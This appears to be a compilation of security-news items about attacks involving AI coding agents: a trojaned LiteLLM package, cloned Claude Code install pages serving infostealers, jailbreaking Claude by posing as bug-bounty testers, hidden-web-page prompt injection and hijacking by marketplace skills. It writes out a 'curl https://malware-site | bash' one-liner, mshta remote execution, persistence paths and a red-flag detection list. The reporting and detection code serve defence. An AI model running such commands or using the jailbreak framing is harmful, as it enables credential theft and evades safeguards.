How Claude Planted Malicious Code In A Crypto-Trading App

April 28, 2026, 10:57

A campaign by North Korean state actors saw a malicious npm package dependency slipped into a crypto-trading agent by an AI coding agent, according to a new report from ReversingLabs. The incident highlights a troubling new frontier in software supply chain attacks: hackers targeting developers...and the AI tools writing their code.

The post How Claude Planted Malicious Code In A Crypto-Trading App appeared first on The Security Ledger with Paul F. Roberts.

Hackers Use Hidden Website Instructions in New Attacks on AI Assistants

Cybersecurity researchers at Forcepoint uncover new indirect prompt injection attacks that use hidden website code to exploit AI assistants like GitHub Copilot.
SentinelOne autonomous detection blocks trojaned LiteLLM triggered by Claude Code

April 1, 2026, 05:58

SentinelOne AI stopped a LiteLLM supply chain attack in seconds, blocking malicious code automatically without human intervention.

SentinelOne’s AI-based security detected and blocked a supply chain attack involving a compromised LiteLLM package.

SentinelOne’s macOS agent detected and stopped a malicious process chain triggered by Claude Code after it unknowingly installed a compromised LiteLLM package. The AI identified suspicious hidden Python code execution via base64 decoding, and killed the process within seconds across hundreds of events. The system traced the full process chain triggered by an AI agent and prevented data theft or further spread, showing the power of autonomous, behavior-based defense.

Attackers indirectly compromised LiteLLM by first breaching trusted tools like Trivy, stealing maintainer credentials to publish malicious versions. The campaign also hit other platforms, showing how open-source trust can be abused. In one case, an AI coding assistant unknowingly installed the infected package, highlighting a new risk: AI agents with full system access can spread attacks automatically.

“SentinelOne’s behavioral detection operates below the application layer. It does not matter whether a malicious package is installed by a human, a CI pipeline, or an AI agent,” reads the report published by SentinelOne. “The platform monitors process behavior via the Endpoint Security Framework, which is why this detection fired regardless of how the infected package arrived.”

Two malicious versions ensured execution: one during normal use, the other at Python startup, expanding the attack’s reach even to systems not actively using LiteLLM.
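The “execution at Python startup” variant is worth unpacking. One common mechanism (the report does not name which was used here, so treat this as an illustrative assumption) is that CPython attempts to import a module named sitecustomize during interpreter initialization, so a package that plants one runs before any application code. A harmless demonstration with a benign stand-in module:

```python
# Illustrative only: shows that CPython tries to import `sitecustomize` at
# startup, one way a trojaned package could execute before any app logic.
import os
import subprocess
import sys
import tempfile

with tempfile.TemporaryDirectory() as d:
    # A benign stand-in for what a malicious package might plant.
    with open(os.path.join(d, "sitecustomize.py"), "w") as f:
        f.write('import sys; sys.stderr.write("sitecustomize ran\\n")\n')

    env = dict(os.environ, PYTHONPATH=d)
    result = subprocess.run(
        [sys.executable, "-c", "print('app code')"],
        env=env, capture_output=True, text=True,
    )
    # The marker appears even though the app never imported anything itself.
    print("sitecustomize ran" in result.stderr)  # prints True on default CPython
```

The child process only ran `print('app code')`, yet the planted module executed first, which is exactly why startup hooks extend an attack to systems that never actively use the infected library.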

The LiteLLM attack began with a small, obfuscated script that launched silently, followed by a data stealer that collected system info, credentials, crypto wallets, and secrets. The malware then ensured persistence by installing a disguised system service that ran in the background and contacted its command server at long intervals to avoid detection.

“The third stage established persistence through a systemd user service at ~/.config/systemd/user/sysmon.service, executing a script at ~/.config/sysmon/sysmon.py,” continues the report. “The persistence mechanism included a 5-minute initial delay before any network activity, a technique specifically designed to outlast automated sandbox analysis. After that, the script contacted its C2 server every 50 minutes, fetching dynamic payload URLs.”
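The persistence location the report describes can be checked for directly. A hedged triage sketch (the function name and the hidden-directory heuristic are illustrative, not from the report): list systemd user units and flag ExecStart lines whose command lives under a dot-directory such as ~/.config.

```python
# Hedged sketch: flag systemd *user* units whose ExecStart points into a
# hidden directory, the pattern described in the report
# (~/.config/systemd/user/sysmon.service -> ~/.config/sysmon/sysmon.py).
import re
from pathlib import Path

def suspicious_user_units(unit_dir: Path) -> list[tuple[str, str]]:
    """Return (unit name, ExecStart) pairs whose command path contains a
    hidden directory component. Heuristic only, not a detector."""
    findings = []
    for unit in sorted(unit_dir.glob("*.service")):
        text = unit.read_text(errors="replace")
        m = re.search(r"^ExecStart=(.+)$", text, re.MULTILINE)
        if m and re.search(r"/\.[^/\s]+/", m.group(1)):
            findings.append((unit.name, m.group(1).strip()))
    return findings
```

In practice you would point it at `Path.home() / ".config/systemd/user"`; legitimate units can also live there, so any hit warrants review rather than automatic deletion.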

The attack expanded beyond the initial machine by creating privileged Kubernetes pods, gaining deep access to cluster nodes and deploying backdoors. Stolen data was encrypted and sent to a server designed to look legitimate, helping it bypass monitoring. Overall, the attack shows how modern threats combine stealth, automation, and multiple layers to move quickly and evade traditional defenses.

“The LiteLLM detection wasn’t a one-off. It’s what happens when autonomous, behavioral AI is built into the foundation, not bolted on after the fact,” concludes the report.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, LiteLLM supply)

Exposed Developer Secrets Surge: AI Drives 34% Increase in 2025

March 17, 2026, 09:05

GitGuardian’s latest Secrets Sprawl report found more than 28 million new secrets exposed via public GitHub commits in 2025, a 34% increase over 2024 and the largest annual jump the company has recorded. The spike reflects a broader transformation in software creation, as AI tools lower the barrier to coding.

The post Exposed Developer Secrets Surge: AI Drives 34% Increase in 2025 appeared first on The Security Ledger with Paul F. Roberts.

Fake Claude Code install pages hit Windows and Mac users with infostealers

March 9, 2026, 10:07

Attackers are cloning install pages for popular tools like Claude Code and swapping the “one‑liner” install commands with malware, mainly to steal passwords, cookies, sessions, and access to developer environments.

Modern install guides often tell you to copy a single command like curl https://malware-site | bash into your terminal and hit Enter. That habit turns the website into a remote control: whatever script lives at that URL runs with your permissions, often those of an administrator.

Researchers found that attackers abuse this workflow by keeping everything identical, only changing where that one‑liner actually connects to. For many non‑specialist users who just started using AI and developer tools, this method feels normal, so their guard is down.

But this basically boils down to “I trust this domain” and that’s not a good idea unless you know for sure that it can be trusted.

It usually plays out like this. Someone searches “Claude Code install” or “Claude Code CLI,” sees a sponsored result at the top with a plausible URL, and clicks without thinking too hard about it.

But that ad leads to a cloned documentation or download page: same logo, same sidebar, same text, and a familiar “copy” button next to the install command. In many cases, any other link you click on that fake page quietly redirects you to the real vendor site, so nothing else looks suspicious.

Similar to ClickFix attacks, this method is called InstallFix. The user runs the code that infects their own machine, under false pretenses, and the payload usually is an infostealer.

The main payload in these Claude Code-themed InstallFix cases is an infostealer called Amatera. It focuses on browser data like saved passwords, cookies, session tokens, autofill data, and general system information that helps attackers profile the device. With that, they can hijack web sessions and log into cloud dashboards and internal administrator panels without ever needing your actual password. Some reports also mention an interest in crypto wallets and other high‑value accounts.

Windows and Mac

The Claude Code-based campaign the researchers found was equipped to target both Windows and Mac users.

On macOS, the malicious one‑liner usually pulls a second‑stage script from an attacker‑controlled domain, often obfuscated with base64 to look noisy but harmless at first glance. That script then downloads and runs a binary from yet another domain, stripping attributes and making it executable before launching it. 
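Base64 obfuscation only makes a script look like noise; it is trivially reversible, so a suspicious one-liner can be decoded and read before it ever runs. For example, with a harmless stand-in string:

```python
# Base64 is encoding, not encryption: decode suspicious blobs to see the
# actual commands they would run. The string below is a harmless example.
import base64

encoded = "ZWNobyBoZWxsbw=="  # what an obfuscated installer stage might look like
decoded = base64.b64decode(encoded).decode()
print(decoded)  # → echo hello
```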

On Windows, the command has been seen spawning cmd.exe, which then calls mshta.exe with a remote URL. This lets the malware logic run under a trusted Microsoft binary rather than as an obvious random executable. In both cases, nothing spectacular appears on screen: you think you just installed a tool, while the real payload silently starts doing its work in the background.

How to stay safe

With ClickFix and InstallFix running rampant—and they don’t look like they’re going away anytime soon—it’s important to be aware, careful, and protected.

  • Slow down. Don’t rush to follow instructions on a webpage or prompt, especially if it asks you to run commands on your device or copy-paste code. Analyze what the command will do before you run it.
  • Avoid running commands or scripts from untrusted sources. Never run code or commands copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. Verify instructions independently. If a website tells you to execute a command or perform a technical action, check through official documentation or contact support before proceeding.
  • Limit the use of copy-paste for commands. Manually typing commands instead of copy-pasting can reduce the risk of unknowingly running malicious payloads hidden in copied text.
  • Secure your devices. Use an up-to-date, real-time anti-malware solution with a web protection component.
  • Educate yourself on evolving attack techniques. Understanding that attacks may come from unexpected vectors and evolve helps maintain vigilance. Keep reading our blog!
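Part of that analysis can be automated. As a sketch, a few illustrative heuristics (these patterns are examples drawn from this campaign, not a complete detector) that flag a pasted command before it runs:

```python
# Hedged sketch: a tiny pre-flight check for pasted install commands.
# The patterns are illustrative heuristics, not a complete detector.
import re

RED_FLAGS = [
    r"curl[^|]*\|\s*(ba)?sh",      # pipe a remote script straight into a shell
    r"base64\s+(-d|--decode)",     # decode-and-run obfuscation
    r"mshta(\.exe)?\s+https?://",  # Windows LOLBin fetching remote code
]

def looks_risky(command: str) -> bool:
    return any(re.search(p, command, re.IGNORECASE) for p in RED_FLAGS)

print(looks_risky("curl https://example.com/install.sh | bash"))  # True
print(looks_risky("pip install requests"))                        # False
```

A hit doesn’t prove the command is malicious — plenty of legitimate installers use curl | bash — but it is exactly the moment to slow down and verify the source.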

Pro tip: Did you know that the free Malwarebytes Browser Guard extension warns you when a website tries to copy something to your clipboard?


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Claude Code abused to steal 150GB in cyberattack on Mexican agencies

March 1, 2026, 10:49

Hackers abused Claude Code to build exploits and steal 150GB of data in a cyberattack targeting Mexican government systems.

Hackers abused Anthropic’s Claude Code AI assistant to develop exploits, create custom tools, and automatically exfiltrate more than 150GB of data in an attack on Mexican government systems, the Israeli cybersecurity firm Gambit Security reports. The case highlights how generative AI can be weaponized to accelerate real-world cyber operations.

Attackers compromised 10 Mexican government agencies and a financial institution, starting with the tax authority in December 2025. Gambit Security found the threat actors sent over 1,000 prompts to Claude Code and used OpenAI’s GPT-4.1 to analyze stolen data.

Attackers jailbroke Anthropic’s Claude and used it for about a month to target multiple Mexican government entities, including the federal tax authority, the electoral institute, state governments, Mexico City’s civil registry, and Monterrey’s water utility. By bypassing AI guardrails and framing actions as authorized, the attacker automated exploit writing and data theft, exfiltrating 150GB of records and exposing about 195 million identities.

Posing as bug bounty testers, they crafted prompts to bypass safeguards. Claude initially resisted, flagging log deletion and stealth instructions as red flags before being manipulated into assisting the operation.

“In total, it produced thousands of detailed reports that included ready-to-execute plans, telling the human operator exactly which internal targets to attack next and what credentials to use,” Curtis Simpson, Gambit Security’s chief strategy officer, told VentureBeat.

When Claude stopped being helpful, the attackers switched to ChatGPT from OpenAI to get guidance on moving deeper into the network and organizing stolen credentials. As the breach progressed, they repeatedly asked where else government identities and related data could be found and which additional systems to target.

“This reality is changing all the game rules we have ever known,” said Alon Gromakov, co-founder and CEO of Gambit Security.

In November 2025, Anthropic disclosed that China-linked actors had also abused Claude Code in an espionage campaign targeting nearly 30 organizations worldwide. The AI was manipulated to perform key operational tasks.


Pierluigi Paganini

(SecurityAffairs – hacking, Claude Code)

When Your AI Coding Plugin Starts Picking Your Dependencies: Marketplace Skills and Dependency Hijack in Claude Code

January 6, 2026, 11:00

AI coding assistants are no longer just autocompleting lines of code; they are quietly making decisions for you. Tools like Claude Code can read projects, plan multi-step changes, install dependencies, and modify files with minimal human oversight. To make this possible, these assistants rely on plugin marketplaces, where third-party developers publish ‘skills’ that teach the agent how to manage infrastructure, testing, and dependencies. Though powerful, the model requires a high degree of trust, and with that trust comes a new set of risks.

At first glance, third-party marketplace plugins look like harmless productivity boosters. Connect a marketplace and enable a plugin, and your coding assistant becomes smarter about your stack. However, beneath the convenience is a security blind spot: these same skills often run with extremely high privilege and very little transparency about how they make decisions or where the code and dependencies come from. The core issue isn’t prompt manipulation or social engineering – it’s compromised automation.

A full technical blog post by SentinelOne’s own Prompt Security team breaks down how a single benign-looking plugin from an unofficial marketplace exposes a dependency management skill. When the developer asks the agent to install a common Python library, that skill quietly redirects the install to an attacker-controlled source, ensuring a trojanized version of the library is pulled into the project. While nothing looks wrong – the library imports cleanly, the example code runs without error – malicious code is now embedded into the environment, capable of exfiltrating secrets, monitoring traffic, or lying dormant until it is triggered at a later time.

What makes this especially concerning is persistence. Marketplace plugins are not one-off interactions. Once enabled, their skills remain available across sessions and will continue to shape how the agent behaves in the future. Rather than a ‘bad prompt’, this effect is more like compromising your package manager itself.

As AI-driven development workflows accelerate, plugin marketplaces and third-party skills are now part of the software supply chain whether teams realize it or not. If your coding assistant can fetch and execute code on your behalf, every plugin installed joins your trust boundary.
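One mitigation for this class of hijack is hash-pinning: record the digest of a known-good artifact and reject anything that differs, even when the package name and version match, so a redirected index cannot silently substitute a trojaned build. A minimal sketch (the helper is hypothetical; pip supports this natively via `--hash=sha256:...` entries in a requirements file combined with `pip install --require-hashes`):

```python
# Hedged sketch of hash-pinning: the name and version of a package can be
# spoofed by a redirected index, but the artifact's digest cannot.
import hashlib
from pathlib import Path

def verify_artifact(path: Path, pinned_sha256: str) -> bool:
    """Compare a downloaded artifact's SHA-256 against a pinned value."""
    return hashlib.sha256(path.read_bytes()).hexdigest() == pinned_sha256
```

The same principle applies whether a human, a CI pipeline, or an AI agent performs the install: if the install path enforces pinned hashes, the redirect described above fails loudly instead of succeeding quietly.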

Read the full blog post here for a detailed walkthrough of the attack mechanics and learn why dependency skills are such a powerful, but under-modeled, risk.

Third-Party Trademark Disclaimer:

All third-party product names, logos, and brands mentioned in this publication are the property of their respective owners and are for identification purposes only. Use of these names, logos, and brands does not imply affiliation, endorsement, sponsorship, or association with the third-party.
